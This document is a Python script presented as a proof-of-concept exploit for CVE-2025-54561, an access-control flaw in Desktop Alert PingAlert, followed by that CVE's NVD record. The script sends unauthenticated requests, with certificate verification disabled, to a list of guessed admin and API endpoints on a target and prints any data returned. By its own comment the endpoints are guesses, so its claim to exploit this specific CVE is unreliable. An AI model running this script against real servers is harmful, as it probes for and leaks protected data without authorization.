CVE-2025-54561

import requests import sys def exploit_cve_2025_54561(target_url): """ PoC for CVE-2025-54561: Desktop Alert PingAlert Incorrect Access Control This PoC demonstrates unauthorized access to protected resources. """ print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2025-54561\n") # Common endpoints that might be accessible without proper authorization endpoints = [ "/api/alerts", "/api/configurations", "/api/system-info", "/api/users/list", "/api/settings", "/api/logs", "/admin/dashboard", "/admin/config" ] for endpoint in endpoints: url = f"{target_url.rstrip('/')}{endpoint}" try: # Send request without authentication headers response = requests.get(url, timeout=10, verify=False) print(f"[+] Endpoint: {endpoint}") print(f" Status Code: {response.status_code}") # Check if access was granted (status 200) without proper auth if response.status_code == 200: print(f" [!] VULNERABLE: Unauthorized access granted!") print(f" Response preview: {response.text[:200]}...\n") else: print(f" [-] Access denied or not found\n") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}\n") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com:8080") sys.exit(1) target = sys.argv[1] exploit_cve_2025_54561(target)

{"cve": {"id": "CVE-2025-54561", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:49.527", "lastModified": "2025-11-20T14:46:20.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows remote access to content despite lack of the correct permission through a Broken Authorization Schema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.5", "matchCriteriaId": "35DFA98A-F509-4F93-99A3-807C4B6548A2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/cve-2025-54561/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}